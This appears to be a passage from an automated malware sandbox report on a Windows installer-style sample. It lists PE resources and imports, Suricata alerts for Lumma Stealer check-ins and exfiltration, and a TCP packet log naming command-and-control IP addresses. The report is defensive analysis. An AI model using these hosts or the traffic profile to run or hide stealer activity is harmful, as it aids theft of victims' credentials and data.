RT_RCDATA	0x129d58	0x300	Delphi compiled form 'TSelectLanguageForm'			0.5703125
RT_RCDATA	0x12a058	0x5d9	Delphi compiled form 'TUninstallProgressForm'			0.4562458249832999
RT_RCDATA	0x12a634	0x461	Delphi compiled form 'TUninstSharedFileForm'			0.4335414808206958
RT_RCDATA	0x12aa98	0x2092	Delphi compiled form 'TWizardForm'			0.2299112497001679
RT_GROUP_CURSOR	0x12cb2c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x12cb40	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x12cb54	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x12cb68	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x12cb7c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x12cb90	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x12cba4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x12cbb8	0x3e	data	English	United States	0.8387096774193549
RT_VERSION	0x12cbf8	0x15c	data	English	United States	0.5689655172413793
RT_MANIFEST	0x12cd54	0x62c	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4240506329113924

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll	GetKeyboardType, LoadStringW, MessageBoxA, CharNextW
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
user32.dll	CreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
msimg32.dll	AlphaBlend
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
version.dll	VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
mpr.dll	WNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
kernel32.dll	lstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
advapi32.dll	SetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
comctl32.dll	InitCommonControls
kernel32.dll	Sleep
oleaut32.dll	GetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
comctl32.dll	InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
shell32.dll	ShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
shell32.dll	SHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
comdlg32.dll	GetSaveFileNameW, GetOpenFileNameW
ole32.dll	CoDisconnectObject
advapi32.dll	AdjustTokenPrivileges
oleaut32.dll	SysFreeString

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-05T17:48:11.970405+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49748	172.67.196.191	443	TCP
2025-01-05T17:48:12.497359+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49748	172.67.196.191	443	TCP
2025-01-05T17:48:12.497359+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49748	172.67.196.191	443	TCP
2025-01-05T17:48:13.023673+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49749	172.67.196.191	443	TCP
2025-01-05T17:48:13.784825+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49749	172.67.196.191	443	TCP
2025-01-05T17:48:13.784825+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49749	172.67.196.191	443	TCP
2025-01-05T17:48:14.916122+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49750	172.67.196.191	443	TCP
2025-01-05T17:48:16.237327+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49751	172.67.196.191	443	TCP
2025-01-05T17:48:17.634212+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49752	172.67.196.191	443	TCP
2025-01-05T17:48:19.368234+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49753	172.67.196.191	443	TCP
2025-01-05T17:48:22.771339+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49753	172.67.196.191	443	TCP
2025-01-05T17:48:23.359449+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49755	172.67.196.191	443	TCP
2025-01-05T17:48:24.846407+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49756	172.67.196.191	443	TCP
2025-01-05T17:48:26.997729+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49757	172.67.196.191	443	TCP
2025-01-05T17:48:27.432779+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49757	172.67.196.191	443	TCP
2025-01-05T17:48:28.207148+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49758	185.161.251.21	443	TCP
2025-01-05T17:48:29.026301+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49759	104.21.37.128	443	TCP
2025-01-05T17:48:29.389777+0100	2008438	ET MALWARE Possible Windows executable sent when remote host claims to send a Text File	1	104.21.37.128	443	192.168.2.4	49759	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 17:48:11.478863001 CET	49748	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:11.478910923 CET	443	49748	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:11.478962898 CET	49748	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:11.505069971 CET	49748	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:11.505088091 CET	443	49748	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:11.970308065 CET	443	49748	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:11.970405102 CET	49748	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:11.975677013 CET	49748	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:11.975697041 CET	443	49748	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:11.975917101 CET	443	49748	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:12.024796009 CET	49748	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:12.069910049 CET	49748	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:12.069931984 CET	49748	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:12.070018053 CET	443	49748	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:12.497356892 CET	443	49748	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:12.497452974 CET	443	49748	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:12.497514963 CET	49748	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:12.505719900 CET	49748	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:12.505745888 CET	443	49748	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:12.505804062 CET	49748	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:12.505810976 CET	443	49748	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:12.519299030 CET	49749	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:12.519346952 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:12.519421101 CET	49749	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:12.519679070 CET	49749	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:12.519695997 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.023551941 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.023673058 CET	49749	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:13.025021076 CET	49749	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:13.025032997 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.025257111 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.026488066 CET	49749	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:13.026513100 CET	49749	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:13.026555061 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.784809113 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.784861088 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.784893990 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.784929991 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.784969091 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.784970999 CET	49749	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:13.784993887 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.785012960 CET	49749	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:13.785033941 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.785038948 CET	49749	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:13.785043955 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.785094976 CET	49749	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:13.785096884 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.785104036 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.785164118 CET	49749	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:13.785170078 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.785510063 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.785556078 CET	49749	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:13.785562038 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.837305069 CET	49749	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:13.876799107 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.876872063 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.876914024 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.876918077 CET	49749	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:13.876935959 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.876976967 CET	49749	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:13.876983881 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:13.931083918 CET	49749	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:14.043329000 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:14.043464899 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:14.043538094 CET	49749	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:14.068248034 CET	49749	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:14.068278074 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:14.068315983 CET	49749	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:14.068321943 CET	443	49749	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:14.439426899 CET	49750	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:14.439471006 CET	443	49750	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:14.439528942 CET	49750	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:14.439872980 CET	49750	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:14.439887047 CET	443	49750	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:14.915934086 CET	443	49750	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:14.916121960 CET	49750	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:14.917314053 CET	49750	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:14.917324066 CET	443	49750	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:14.917553902 CET	443	49750	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:14.918726921 CET	49750	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:14.918869972 CET	49750	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:14.918906927 CET	443	49750	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:14.918968916 CET	49750	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:14.918976068 CET	443	49750	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:15.551248074 CET	443	49750	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:15.551372051 CET	443	49750	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:15.551459074 CET	49750	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:15.551528931 CET	49750	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:15.551547050 CET	443	49750	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:15.664674997 CET	49751	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:15.664714098 CET	443	49751	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:15.664791107 CET	49751	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:15.665040016 CET	49751	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:15.665054083 CET	443	49751	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:16.237257957 CET	443	49751	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:16.237327099 CET	49751	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:16.238459110 CET	49751	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:16.238472939 CET	443	49751	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:16.238708973 CET	443	49751	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:16.239718914 CET	49751	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:16.239834070 CET	49751	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:16.239862919 CET	443	49751	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:16.714039087 CET	443	49751	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:16.714128971 CET	443	49751	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:16.714184999 CET	49751	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:16.716932058 CET	49751	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:16.716948032 CET	443	49751	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:17.172053099 CET	49752	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:17.172087908 CET	443	49752	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:17.172173023 CET	49752	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:17.172432899 CET	49752	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:17.172447920 CET	443	49752	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:17.634136915 CET	443	49752	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:17.634212017 CET	49752	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:17.635740995 CET	49752	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:17.635751009 CET	443	49752	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:17.635987997 CET	443	49752	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:17.637276888 CET	49752	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:17.637461901 CET	49752	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:17.637495041 CET	443	49752	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:17.637676954 CET	49752	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:17.637685061 CET	443	49752	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:18.255944967 CET	443	49752	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:18.256045103 CET	443	49752	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:18.256104946 CET	49752	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:18.256299019 CET	49752	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:18.256321907 CET	443	49752	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:18.874293089 CET	49753	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:18.874335051 CET	443	49753	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:18.874953032 CET	49753	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:18.876043081 CET	49753	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:18.876055956 CET	443	49753	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:19.368149042 CET	443	49753	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:19.368233919 CET	49753	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:19.375757933 CET	49753	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:19.375777006 CET	443	49753	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:19.375965118 CET	443	49753	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:19.390320063 CET	49753	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:19.390410900 CET	49753	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:19.390439034 CET	443	49753	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:22.771343946 CET	443	49753	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:22.771449089 CET	443	49753	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:22.771505117 CET	49753	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:22.771655083 CET	49753	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:22.771672010 CET	443	49753	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:22.842998028 CET	49755	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:22.843020916 CET	443	49755	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:22.843102932 CET	49755	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:22.843394995 CET	49755	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:22.843405962 CET	443	49755	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:23.359385014 CET	443	49755	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:23.359448910 CET	49755	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:23.360460043 CET	49755	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:23.360467911 CET	443	49755	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:23.360672951 CET	443	49755	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:23.361635923 CET	49755	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:23.361701965 CET	49755	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:23.361711025 CET	443	49755	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:23.834455967 CET	443	49755	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:23.834547997 CET	443	49755	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:23.834619045 CET	49755	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:23.834732056 CET	49755	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:23.834753990 CET	443	49755	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:24.370155096 CET	49756	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:24.370189905 CET	443	49756	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:24.370246887 CET	49756	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:24.370585918 CET	49756	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:24.370604038 CET	443	49756	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:24.846213102 CET	443	49756	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:24.846406937 CET	49756	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:24.847526073 CET	49756	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:24.847538948 CET	443	49756	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:24.847858906 CET	443	49756	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:24.854077101 CET	49756	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:24.854738951 CET	49756	443	192.168.2.4	172.67.196.191
Jan 5, 2025 17:48:24.854772091 CET	443	49756	172.67.196.191	192.168.2.4
Jan 5, 2025 17:48:24.854863882 CET	49756	443	192.168.2.4	172.67.196.191
